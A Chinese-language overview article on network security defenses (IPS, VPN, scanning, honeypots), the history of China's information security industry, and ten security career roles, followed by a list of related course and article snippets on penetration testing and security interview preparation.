    入侵防护系统(IPS)则倾向于提供主动防护,注重对入侵行为的控制。其设计宗旨是预先对入侵活动和攻击性网络流量进行拦截,避免其造成损失。IPS是通过直接嵌入到网络流量中实现这一功能的,即通过多个网络端口接收来自外部系统的流量,经过检查确认其中不包含异常活动或可疑内容后,通过另外一个端口把它传送到内部系统中。这样一来,有问题的数据包,以及所有来自同一数据流的后续数据包,都能在IPS设备中被清除掉。

    VPN

    VPN网络连接由客户机、传输介质和服务器三部分组成,VPN的连接不是采用物理的传输介质,而是使用称之为“隧道”的技术作为传输介质,这个隧道是建立在公共网络或专用网络基础之上的。常见的隧道技术包括:点对点隧道协议(Point-to PointTunneling Protocol,PPTP)、第2层隧道协议(Layer 2 Tunneling Protocol.L2TP)和IP安全协议(IPSec)。

    安全扫描

    安全扫描包括漏洞扫描、端口扫描、密码类扫描(发现弱口令密码)等。安全扫描可以应用被称为扫描器的软件来完成,扫描器最有效的网络安全检测工具之一,它可以自动检测远程或本地主机、网络系统的安全弱点以及所存在可能被利用的系统漏洞。

    网络蜜罐技术

    蜜罐(Honeypot)技术是一种主动防御技术,是入侵检测技术的一个重要发展方向,也是一个“诱捕”攻击者的陷阱。蜜罐系统是一个包含漏洞的诱骗系统,它通过模拟一个或多个易受攻击的主机和服务,给攻击者提供一个容易攻击的目标。攻击者往往在蜜罐上浪费时间,延缓对真正目标的攻击。由于蜜罐技术的特性和原理,使得它可以对入侵的取证提供重要的信息和有用的线索,便于研究入侵者的攻击行为。

    企业信息系统的安全防御体系可以分为三个层次:安全评估,安全加固,网络安全部署。

    二、信息安全发展历程

    2.1信息安全发展简介

    国际标准化组织(ISO)将信息安全定义为:为数据处理系统建立和采取的技术和管理的安全保护,保护计算机硬件、软件和数据不因偶然和恶意的原因而遭到破坏、更改和泄漏,使系统能够连续、正常运行。但随着信息安全行业的发展,信息安全的内涵不断延伸,从最初的信息保密性发展到信息的完整性、可用性、可控性和不可否认性,进而又发展为“攻(攻击)、防(防范)、测(检测)、控(控制)、管(管理)、评(评估)”等多方面的基础理论和实施技术。

    信息安全的历史其实是黑帽子和白帽子的对抗史,黑帽子通常指身怀绝技能随意出入计算机网络和系统的高手,白帽子是指维护网络与系统的安全管理人员。他们对抗的过程中也就是不断发现漏洞和填补漏洞的过程,从而促进了信息安全技术的不断进步。

    2.2信息安全发展历程

    随着IT技术的发展,各种信息电子化,更加方便地获取、携带与传输,相对于传统的信息安全保障,需要更加有力的技术保障,而不单单是对接触信息的人和信息本身进行管理,介质本身的形态已经从“有形”到“无形”。在计算机支撑的业务系统中,正常业务处理的人员都有可能接触,截取这些信息,信息的流动是隐性的,对业务流程的控制就成了保障涉密信息的重要环节。

    从信息安全的发展历程来看,信息安全经历了通信保密阶段、信息安全阶段、信息保障阶段这三个阶段

                                                                                                                        

    第一阶段:通信保密阶段

    1995年以前,以通信保密和依照TCSEC的计算机安全标准开展计算机的安全工作,其主要的服务对象是政府保密机构和军事机构

    第二阶段:信息安全阶段

    在原有基础上,1995年开始以北京天融信网络安全技术有限公司、北京启明星辰信息技术有限公司,北京江南科友科技有限公司、北京中科网威信息技术有限公司、北京清华德实科技股份有限公司、上海复旦光华信息科技股份有限公司等一批从事信息化安全企业的诞生为标志的创业发展阶段,主要从事计算机与互联网安全。

    从1999年起,将信息安全的工作重点逐步转移到银行与电信信息化安全建设上。

    2000年我国第一个行业性质的《银行计算机系统安全技术规范》出台,为我国信息化安全建设奠定了基础和树立了示范。

    这个时期主要提供的是隔离、防护、检测、监控、过滤等中心的局域网安全服务技术与产品,其主要面对病毒、黑客和非法入侵等威胁。到2001年,一时间全国成立1300多家从事信息化安全的企业。

    第三阶段:信息保障

    以2002年成立中国信息产业商会信息安全产业分会为标志的有序发展阶段。这个阶段不仅从事互联网的信息与网络安全,而且开始对国家基础设施信息化安全开展工作,产生了许多自有知识产权的信息与网络安全产品。

    三、信息安全职业发展方向

    3.1信息安全职业前景

    政策推进,行业成长再上新台阶

    3.2信息安全职业发展方向

    信息安全涉及到软件安全、网络安全、web安全、系统安全、密码学等等领域。

    信息安全发展方向

    信息安全主要有三个就业方向,渗透测试相关(脚本、网络)协议分析相关(逆向、网络)底层安全相关(内核、驱动)

    国家路线:政府机关、保密局、军事部国防部、国家相关安全部门、银行、金融证券、通讯电信业,主要从事各类信息安全系统、计算机安全系统的方面的安全防护工作。

    信息安全十大安全岗位

    1.首席信息安全官(CISO)

    首席信息安全官是C级高管,其主要任务是监督企业的IT安全部门和其它相关人员的日常工作。首席安全官最关注企业的整体安全情况,因此,必须在IT战略和安全体系方面展示出过硬的背景和与他人沟通的技巧。

    2.安全架构师

    安全架构师的职责是建立和维护计算机网络安全基础设施,能针对企业的技术和信息需求制定一份全面的规划,并在此基础上开发和测试安全基础设施,保护企业的系统。安全架构师应当掌握一系列技术概念:ISO 27001/27002(信息安全管理实施规则与规范体系)、ITIL(IT基础架构库)和COBIT(信息及相关技术控制目标)、风险评估流程、操作系统、边界安全控制等。

    3.安全主管

    安全主管的职责是监督企业中所有安全措施的实行情况,主要职责是针对公司中的各种安全项目进行设计、管理、分配资源;在公司中组织培训,培养用户意识,进行安全教育;与非管理层员工进行互动;在安全事件发生过程中、事后执法调查时提供关键援助。在一些较小的企业中,其功能相当于首席信息安全官

    4.安全经理

    安全经理的职责是管理企业的IT安全政策,主要是根据安全主管和首席信息安全官的指令创建和执行安全策略。他们还必须测试和使用新的安全工具,引导安全意识教育,同时管理部门预算和人员安排。安全经理应当同时具有程序设计、公司架构、IT策略背景。

    5.安全工程师

    安全工程师的职责是建立和维护公司的IT安全解决方案,需要配置防火墙、测试新的安全解决方案、调查入侵事件并完成其他任务,同时向安全经理汇报。渴望成为安全工程师的人们必须具备在漏洞、渗透测试、虚拟化安全、应用和加密、网络和相关协议方面很深的技术背景。一位安全工程师越熟悉更多的工具和概念,就越能帮助解决公司安全系统出现的种种问题。

    6.应急响应人员

    主要工作是对公司内的安全漏洞、安全事件、威胁进行响应,并为之负责。因此,那些有志于这一职位的人必须能够实时监控公司的网络,发现其中的入侵迹象,进行安全审查、渗透测试、恶意软件分析、逆向工程,并设计不仅能够减少特定安全事件的影响,还能防止类似的进一步入侵发生的策略。需要熟悉大量的技术,包括基于网页的应用安全、数据处理及电子鉴定软件和工具。

    7.安全顾问

    安全顾问是帮助公司根据安全需求实现最佳解决方案的外聘专家。希望成为安全顾问的人必须了解一系列安全标准、安全系统和验证协议。如果想要做的优秀,还需要乐意建立所属公司的深度模型,这包括和管理人员以及其他高管进行商谈,并熟悉公司的安全策略。

    8.计算机鉴定专家

    分析从计算机吗,网络和其他数据存储设备上抓取的证据,以调查计算机犯罪事件。鉴定专家通常与执法部门关系密切,收集可以作为法律证据的信息。执法机构、法律公司以及各级政府都经常雇佣计算机鉴定专家。希望从事此项职业的人们必须熟悉多种编程语言、操作系统、密码学原理、数据处理及电子鉴定工具。

    9.恶意软件分析师

    恶意软件分析师的职责是帮助公司理解病毒、蠕虫、自运行木马、传统木马,以及其他日常可能危害公司网络的恶意软件。在一次入侵或其他可疑计算机行为中发现那些可能渗透进公司计算机系统的恶意软件。担任这项职务需要具有对恶意代码进行静态或动态分析的能力,以找出恶意软件的指纹,并开发能够防止未来可能入侵的工具。

    10.安全专家

    需要执行一系列旨在加强公司安全情况的职责。通常情况下,安全专家需要分析一家公司的安全需求、在企业网络上安装和配置安全解决方案、进行漏洞测试、帮助培训其他员工的安全意识。想要成为安全专家的人们应当对黑客、计算机网络、编程、安全信息和事件管理(SIEM)系统感兴趣。

    参考:安全攻防概述及入侵阶段类型介绍_哔哩哔哩_bilibili

    展开全文
  • 内网安全理论的提出是相对于传统的网络安全而言的。在传统的网络安全威胁模型中,假设内网的所有人员和设备都是安全和可信的,而外部网络则是不安全的。基于这种假设,产生了防病毒软件、防火墙、IDS、UniNAC准入...
  • android安全攻防实战

    2018-04-15 08:56:44
    android进阶的数目是你通向Android高阶工程师道路首选的一本书。
  • 课程目标: 掌握安卓Android手机渗透测试与网络攻防技巧 二、课程简介: 1、Kali Linux是基于Debian的Linux发行版操作系统,一开始是由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,...
  • 一、课程介绍 1、DVWA(Damn Vulnerable Web App)是一个基于PHP/MySql搭建的Web应用程序,旨在为安全专业人员测试自己的专业技能和工具提供合法的 环境,帮助Web开发者更好的理解Web应用安全防范的过程。...
  • 一、课程简介: 1、Metasploit-framework旗下的msfpayload(荷载生成器)、msfencoder(编码器)、msfcli(监听接口)已然成为历史,取而代之的是msfvenom。 2、正所谓万变不离其宗,了解原理是最重要的。...
  • Web安全攻防

    2020-10-25 18:02:21
    无所不能的白帽子维护着网络安全,你是否也想成为他们的一员呢?那就开始努力学习吧! 考虑到部分新手朋友,我们在课程中加入了web相关的基础知识,帮助大家轻松入门。 本教程的特色在于理论和实践相结合,既避免...
  • 本课仅做学习交流,请自觉遵守网络安全法等法律法规! 二、课程概要        本课程主要分享网络攻防与渗透测试面试练习题!   三、适合人员       1、零基础大学生   ...
  • 中科院网络安全工程师培训教材,内容丰富
  • web安全攻防入门培训

    2021-04-06 22:02:57
    本课程为有一定基础但是基础并不是特别牢固的同学准备,定级为入门到进阶课程,同时适合零...帮助大家了解并学习网络安全、信息安全、Web安全,且传授黑客、白帽实战技能,本课程为体系化、实战化的全方位教学课程。
  • Python安全攻防-从入门到入狱

    万次阅读 多人点赞 2022-01-07 13:33:22
    Python安全攻防-从入门到入狱
  • 目录 1.1.1. 简单网站 1.1.1.1. 静态页面 1.1.1.2. 多媒体阶段 1.1.1.3. CGI阶段 1.1.1.4. Ajax 1.1.1.5. MVC 1.1.2. 数据交互 ...1.1.2.1....1.1.2.2....1.1.2.3....1.1.2.4....1.1.3.1....1.1.3.2....1.1.3.3....1.1.4.1....
  • 这个时候发面经已经有点晚了,所以现在打算让这篇面经主要... 其次,要端正一个态度就是测试人员不是一个电脑小白,相反国外顶级的测试开发工程师同时也是顶级的开发工程师甚至更厉害,所以作为一个测试工程师一定要
  • 网络安全攻防:概述

    千次阅读 2021-01-02 08:09:03
    01 传统网络安全攻防体系 黑客发起一次完整的网络攻击一般包含:目标锁定、信息采集、漏洞分析、攻击执行、权限提升、目标控制等步骤。 (1)目标锁定 发起攻击的第一步就是确定一个目标,要确定本次攻击的可行性,...
  • 根据机构调研,目前安全问题80%都发生在...本课程中,从web安全漏洞原理、攻击手段、测试方法、预防措施四个方面全面剖析WEB安全的点点滴滴,针对开发人员、测试人员、运维人员、网络工程师都能够起到一定的指导意义。
  • 深信服2018秋招安全攻防笔试题

    千次阅读 2018-10-14 10:17:49
    深信服2018秋招安全攻防笔试题 一、题型分布 二、单选题 题目比较多,记不清了 但主要是考基础知识,TCP 四层模型、病毒反调试特征、躲避杀软检测的方法。 其中web方面比较多一些,这方面比较欠缺,不太熟悉 ...
  • 安全活动」网络安全工程师创新能力培养体系的研究_ - 数据库审计 安全管理 数据泄露 终端安全 渗透测试 安全研究
  • 如果你立志成为一名合格的安全从业者,想突破“脚本小子”的瓶颈,成为真正的黑客,想拥有自己打造出来的属于自己的神兵利器!《Python安全攻防:渗透测试实战指南》已经出版,配套星球现在可以...
  • 1.2.1. 历史发展 1939年,图灵破解了Enigma,使战争提前结束了两年,这是较早的一次计算机安全开始出现在人们的视野中,这个时候计算机的算力有限,人们使用的攻防方式也相对初级。 1949年,约翰·冯·诺依曼(John ...
  • 那这个行业其实还是比较内敛的,这一年多的时间里面,我看招聘网站上面的安全岗位的要求变化还是比较大的,不过相对的这个薪资待遇也是越来越高了,而且现在有些公司招的安全运维工程师直接要求必须要熟悉渗透测试的...
  • 前言 这次花了大把精力一边学习一边整理网络安全服务职位(包括但不仅限于:安全服务工程师,安全运营工程师,安全运维工程师,安全攻防工程师“)的面试问题。 话不多说,让我们一起学习吧 目前来说还有非常多的不...
  • 赠书!Python 安全攻防,终于来了!

    千次阅读 2020-10-22 14:40:00
    点击上方“逆锋起笔”,公众号回复pdf领取大佬们推荐的学习资料吴涛、方嘉明、吴荣德、徐焱编著在网络安全领域,是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,...
  • 如果你立志成为一名合格的安全从业者,想突破“脚本小子”的瓶颈,成为真正的黑客,想拥有自己打造出来的属于自己的神兵利器!《Python安全攻防:渗透测试实战指南》马上就要出版,配套星球现在...
  • 文章目录答案参考第一题:加密解密第二题:前端配置项第三题:最好的语言第四题:SQL 注入第五题:APP 逆向第六题:IDA 逆向 SO第七题:风控恶意 IP总结 答案参考 第一题:a1cd5f84-27966146-3776f301-64031bb9 ...
  • 如果你立志成为一名合格的安全从业者,想突破“脚本小子”的瓶颈,成为真正的黑客,想拥有自己打造出来的属于自己的神兵利器!《Python安全攻防:渗透测试实战指南》马上就要出版,配套星球现在...
  • 2、搜索:Kali与编程,学习更多网络攻防干货!一、背景介绍在我们日常使用Kali Linux时,我们通常在进行模拟攻防演练的时候,我们如何拿下目标主机最高权限呢(例如利用病毒拿下Win7主机),怎样在受害者主机进行随意...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 4,085
精华内容 1,634
关键字:

安全攻防工程师